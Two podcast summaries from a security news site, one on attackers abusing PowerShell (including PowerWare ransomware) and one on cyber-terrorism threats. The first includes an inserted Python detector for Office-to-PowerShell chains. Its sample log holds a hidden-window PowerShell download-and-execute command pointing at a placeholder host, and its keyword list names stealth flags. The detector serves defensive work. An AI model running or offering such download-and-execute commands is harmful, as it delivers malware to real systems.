Talking PowerShell and Stealth Attacks with Carbon Black’s Rico Valdez

Malicious actors are increasingly using legitimate tools such as PowerShell to lessen their digital footprint and evade detection, and because that technology is both ubiquitous and legitimate, organizations find it hard to defend against the threats that abuse it.

That’s according to Carbon Black senior security researcher Rico Valdez, who joined us for this week’s Cyber Chat podcast to discuss recent research on PowerShell, including a new report examining more than 1,100 security investigations in 2015.

Windows PowerShell is an automation platform and scripting language that Microsoft describes as “providing a massive set of built-in functionality for taking control of your Windows environments.”

The legitimate use along with the built-in functionality makes it a perfect tool for attackers to exploit.

“It used to be the kind of thing where only really sophisticated adversaries would use it, but it’s gotten to the point now where it’s being incorporated in a lot of commodity malware,” Valdez said. “It’s another way to stay under the radar and try to remain undetected.”

Utilizing PowerShell fits into the overall trend of attackers avoiding dropping a lot of tools onto a system; instead, they utilize what’s already there in order to further their goals.

“Monitoring it can be very tricky,” Valdez said. “I don’t think it’s very well understood even by the larger SOCs (security operations centers). It’s one of those things that’s a little bit further down on the list for a lot of these organizations to really dig into.”

How are criminals using PowerShell?

When looking at the data from a variety of Incident Response and MSSP partners, 38% of confirmed cyber incidents used PowerShell. This included all industries and multiple attack campaigns.

PowerShell is used for a variety of malicious purposes, according to Carbon Black’s report.

“It’s quite powerful in that it can pretty much touch any part of the system, and if you’re running it with the right privileges it can pretty much do anything on the system,” Valdez said.

For example, last month a new family of ransomware was discovered dubbed “PowerWare.” PowerWare uses the popular technique of duping users via phishing messages containing a macro-enabled Microsoft Word document. The malicious macros then use PowerShell to further the attack.
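The Word-macro-to-PowerShell chain described above is exactly the kind of parent/child relationship a SOC can watch for. The detector below is an added example, not code from Carbon Black or the report; it runs over constructed process-creation log lines in a simple key=value form (not real Sysmon or Carbon Black output) and flags PowerShell launched by an Office application, plus the usual stealth flags (hidden window, encoded command, download-and-execute).

```python
"""Flag PowerShell launched from an Office parent (the PowerWare-style chain:
phishing -> Word macro -> PowerShell). Log lines below are constructed
samples in a key=value form, not real endpoint telemetry."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_FLAGS = ("-enc", "-e ", "-nop", "-w hidden", "-windowstyle hidden",
                    "downloadstring", "iex", "invoke-expression")

# Constructed sample events (hosts, paths and the encoded blob are placeholders).
SAMPLE_LOG = """\
ts=2016-04-21T10:01:02 event=ProcessCreate parent=explorer.exe image=powershell.exe cmdline="powershell.exe -File C:\\scripts\\backup.ps1"
ts=2016-04-21T10:05:17 event=ProcessCreate parent=winword.exe image=powershell.exe cmdline="powershell.exe -nop -w hidden -enc QQBBAEEAQQA="
ts=2016-04-21T10:06:40 event=ProcessCreate parent=winword.exe image=splwow64.exe cmdline="splwow64.exe 12288"
ts=2016-04-21T10:07:03 event=ProcessCreate parent=excel.exe image=cmd.exe cmdline="cmd.exe /c powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
"""

FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')

def parse_event(line):
    """Turn one key=value line into a dict; quoted values keep their spaces."""
    return {m.group(1): (m.group(3) if m.group(3) is not None else m.group(2))
            for m in FIELD_RE.finditer(line)}

def score_event(ev):
    """Return the reasons an event looks like an Office-macro -> PowerShell chain."""
    reasons = []
    parent = ev.get("parent", "").lower()
    image = ev.get("image", "").lower()
    cmd = ev.get("cmdline", "").lower()
    # PowerShell (directly or via cmd.exe) with an Office parent is the core signal.
    if parent in OFFICE_PARENTS and ("powershell" in image or "powershell" in cmd):
        reasons.append(f"powershell spawned by office app {parent}")
    # Stealth flags on their own are worth noting even with a benign-looking parent.
    if "powershell" in cmd:
        reasons.extend(f"flag {f.strip()}" for f in SUSPICIOUS_FLAGS if f in cmd)
    return reasons

def detect(log_text):
    """Return (timestamp, reasons) for every event that raised at least one reason."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["ts"], reasons))
    return hits
```

The splwow64.exe child of Word and the explorer-launched backup script are deliberately left unflagged, showing that the rule keys on the parent-plus-PowerShell combination rather than on every Office child process.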

Eighty-seven percent of the attacks leveraging PowerShell were commodity malware attacks such as ransomware, click fraud, fake antivirus, and others. Only 13% were described as “advanced” attacks.

This technique is a good example of how attacks tend to evolve, Valdez said. First they’re discovered by sophisticated actors and used in targeted attacks. Then — if they work well — they become mainstream.

“This is a real risk in your environment and you need to be aware of it, because, again, most people aren’t watching it, monitoring it, anything like that.”

Listen to the full conversation with Carbon Black’s Rico Valdez for more about PowerShell and how organizations can protect themselves.

About the Podcast
A new ransomware family was recently discovered dubbed PowerWare, which targets organizations via Microsoft Word and PowerShell, and just last week Carbon Black released a report looking at how PowerShell is being utilized for malicious intent. They wrote in the report that “the discovery of using PowerShell in attacks such as PowerWare is part of a larger, worrisome trend when it comes to PowerShell.”

On today’s Cyber Chat we talk with Carbon Black senior security researcher Rico Valdez about the company’s recent findings and how cybercriminals are increasingly using PowerShell to remain under the radar while targeting organizations.


Talking Cyber-Terrorism and ISIS with Morgan Wright

U.S. Cyber Command has its “first wartime assignment” in the fight against ISIS, Secretary of Defense Ashton Carter told an audience at the Center for Strategic and International Studies last Tuesday. That cyber fight includes techniques to disrupt the group’s ability to communicate, organize and finance its operations.

On the same day, head of U.S. Cyber Command Admiral Michael Rogers told the Senate Armed Services Committee that among his biggest fears are the possibility of groups like ISIS manipulating electronic data records, impacting critical infrastructure such as the electrical grid or air traffic control systems, and using cyber tools “as a weapons system.”

The week’s news capped off a period of increasing discussion around cyberwarfare and cyber-terrorism.

It’s an issue that organizations need to be aware of, said cybersecurity and counter-terrorism expert Morgan Wright, who discussed the topic on this week’s Cyber Chat podcast.

“It is a different animal,” Wright said. “Companies really need to understand the implication of the difference between just cybercrime and cyber-terrorism because it will make a difference in how you respond.”

The Cyber-Terrorism Threat

The December 2015 cyber-attack in Ukraine, which affected electricity for 225,000 customers, was unique in that it’s the first confirmed attack to take down a power grid. In addition, just last month the U.S. officially charged an Iranian with access to a computer control system for New York’s Bowman Avenue Dam. Luckily, a gate on the dam had been disconnected for maintenance issues; otherwise, the hacker could have operated and manipulated the gate, authorities said.

Wright agreed with other experts that the BlackEnergy malware used in the Ukraine attack is a bigger issue than other often-cited critical infrastructure threats such as Stuxnet.

“It’s in this country, and we talk about it but we don’t really take it seriously,” Wright said. “[BlackEnergy] could actually be a terrorist — a cyber-terrorism — type of tactic. … Let’s say that a group like Al-Qaeda or ISIS gets ahold of this and they decide they want to take out part of our power grid.”

But it’s not just critical infrastructure operators who need to be concerned about cyber-terrorism, he added. Organizations, particularly those with ties to often-targeted states such as Israel, need to be aware of those risks.

Businesses need to examine their geopolitical footprint, Wright said. Where are you operating, what types of things may be impacted if you are targeted by some of these organizations, and how can you better prepare to defend against those potential threats?

The Researchers Who Cried Wolf?

There have been a few headline-grabbing events tied to cyberwar and cyber-terrorism, but when compared to traditional cybercrime events, the former threat can appear rather sparse.

When asked about fatigue or backlash from researchers warning of these types of threats, Wright attributed the problem to lack of imagination.

“Plots can take years to develop,” he said. “What I tell people is that just because you can’t imagine it happening right now doesn’t mean it’s not being worked on — it’s not being plotted for.”

As an example he highlighted the recent cybersecurity issues facing the automobile industry. Years before, he said people accused him of fear mongering for bringing up those very issues.

“Now the entire automotive industry is up in arms,” he said. “Guess what? Three years ago they couldn’t imagine that happening, and for 15 years the automotive industry did absolutely nothing.”

In the end though, although cyber-terrorism motivations may be different from cybercrime, the defense is similar.

“You still respond to it. You still prepare. Only later do the motivations really make a difference in terms of what could we have done to detect this or prevent this.”

Listen to the full conversation with Morgan Wright for more about cyber-terrorism, the threat of groups like ISIS and his cybersecurity “rules of the road.”

About the Podcast
In an interview last week, U.S. Secretary of Defense Ashton Carter confirmed he had given U.S. Cyber Command its first wartime assignment and that the team would start launching online attacks against ISIS. The announcement comes after several months of news and debate about the issue of cyber-terrorism.

On today’s Cyber Chat we talk with cyber-terrorism expert Morgan Wright, who has nearly two decades in state and local law enforcement and has previously held roles such as senior advisor for the U.S. State Department Anti-terrorism Assistance Program. We talk about the threat of cyber-terrorism, recent attacks against critical infrastructure, and how groups such as ISIS are shaping the cyber threat landscape.